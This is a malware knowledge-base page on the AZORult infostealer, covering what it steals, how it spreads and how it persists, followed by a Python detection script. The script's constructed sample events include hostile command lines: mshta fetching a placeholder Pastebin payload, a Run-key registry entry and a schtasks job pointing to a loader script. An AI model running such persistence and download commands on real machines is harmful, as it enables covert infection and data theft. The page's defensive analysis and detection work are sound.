Triage: Knowledge Base

AZORult's Year Activity


AZORult in Triage

Description

AZORult is an infostealer trojan which has been used in the wild since early 2016. It has received multiple updates over the years and is still being actively used in 2020. Initial versions were written in Delphi; later versions are written in C++.

Initial versions of the family featured no persistence mechanism and deleted themselves from the infected system after harvesting and exfiltrating useful personal data. Later updates have added persistence mechanisms, including via Scheduled Tasks and registry Run keys.

It can steal data from a range of sources, including:

  • Various web browsers
  • Email clients
  • Cryptocurrency wallets (Bitcoin, Electrum, Ethereum, etc.)
  • Common communication software (Telegram, Skype, Pidgin Messenger etc.)
  • Steam game client
  • FTP/SSH credentials (FileZilla, WinSCP, etc.)

Samples are often distributed via malicious Office documents, though other methods including fake VPN downloads have also been observed.

AZORult++

At the end of 2018 the main seller of AZORult announced the discontinuation of the trojan's development and closed sales. However, in early 2019 a new version appeared online, written in C++ rather than the original Delphi and apparently created by part of the initial development team. This version is sometimes referred to as AZORult++.

This newer version includes some additional features over the original, such as Remote Desktop (RDP) access to infected machines.

Common Behaviour

C2 Extraction

Triage processes the payload during analysis to extract the C2 URL/IP, making it visible even if execution fails or the C2 is now inactive.

Example C2 extraction (https://tria.ge/reports/200403-ndtpt6rnka/behavioral1)

Persistence

Over time some persistence methods have been added to versions of AZORult. This generally takes the form of a registry Run key pointing to a loader script, stored either locally or remotely:

Run key pointing to local VBS file

Run key pointing to remote script on Pastebin

Some samples make use of tools like schtasks to create Scheduled Tasks to launch the loader script:

Schtasks.exe used to gain persistence

  • Excel spawns unexpected process (MSHTA.exe)
  • MSHTA and PowerShell make network requests
  • Persistence via Run keys and Scheduled Tasks
  • Uses Pastebin for payload download (depends on infection method)
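As an added example (not part of the Triage write-up), the following Python turns the behaviours listed above into detection logic run over constructed Sysmon-style process-creation records. The file paths, task name and Pastebin URL are placeholders, not indicators from any real sample.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style); all values are placeholders.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://pastebin.com/raw/EXAMPLE"},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /t REG_SZ /d "wscript C:\Users\Public\loader.vbs"'},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 5 /tn Update /tr "C:\Users\Public\loader.vbs"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

OFFICE_APPS = ("excel.exe", "winword.exe", "powerpnt.exe")
LOLBINS = ("mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe")
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\b", re.IGNORECASE)        # HKCU/HKLM Run key
SCRIPT_RE = re.compile(r"\.(vbs|js|hta|ps1)\b|https?://", re.IGNORECASE)   # local script or remote URL
PASTEBIN_RE = re.compile(r"pastebin\.com", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the list of behaviour labels matched by one process-creation event."""
    hits = []
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    if parent in OFFICE_APPS and image in LOLBINS:
        hits.append("office_spawns_lolbin")          # Office document spawning MSHTA/PowerShell/WScript
    if image == "reg.exe" and RUN_KEY_RE.search(cmd) and SCRIPT_RE.search(cmd):
        hits.append("runkey_to_script")              # Run key pointing to a loader script or URL
    if image == "schtasks.exe" and "/create" in cmd.lower() and SCRIPT_RE.search(cmd):
        hits.append("schtask_to_script")             # Scheduled Task launching a loader script
    if PASTEBIN_RE.search(cmd):
        hits.append("pastebin_url")                  # payload staging on Pastebin
    return hits

def scan(events):
    """Map each suspicious event's command line to its labels; benign events are dropped."""
    return {e["cmdline"]: labels for e in events if (labels := classify(e))}
```

On the constructed events, `scan(SAMPLE_EVENTS)` flags the three malicious records and ignores the notepad launch.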

External References

1. Azorult on Malpedia

   Listing of relevant open-source blog posts, YARA rules, etc.

2. Azorult on MITRE ATT&CK

   Details of all TTPs associated with the family's activity.

Tactics, Techniques, and Procedures

Defense Evasion: Access Token Manipulation

Defense Evasion: Deobfuscate/Decode Files or Information

Discovery: File and Directory Discovery

Defense Evasion: Indicator Removal on Host

Command and Control: Remote File Copy

Discovery: Process Discovery

Defense Evasion: Process Injection

Discovery: Query Registry

Collection: Screen Capture

Discovery: System Information Discovery

Discovery: System Network Configuration Discovery

Discovery: System Owner/User Discovery

Discovery: System Time Discovery
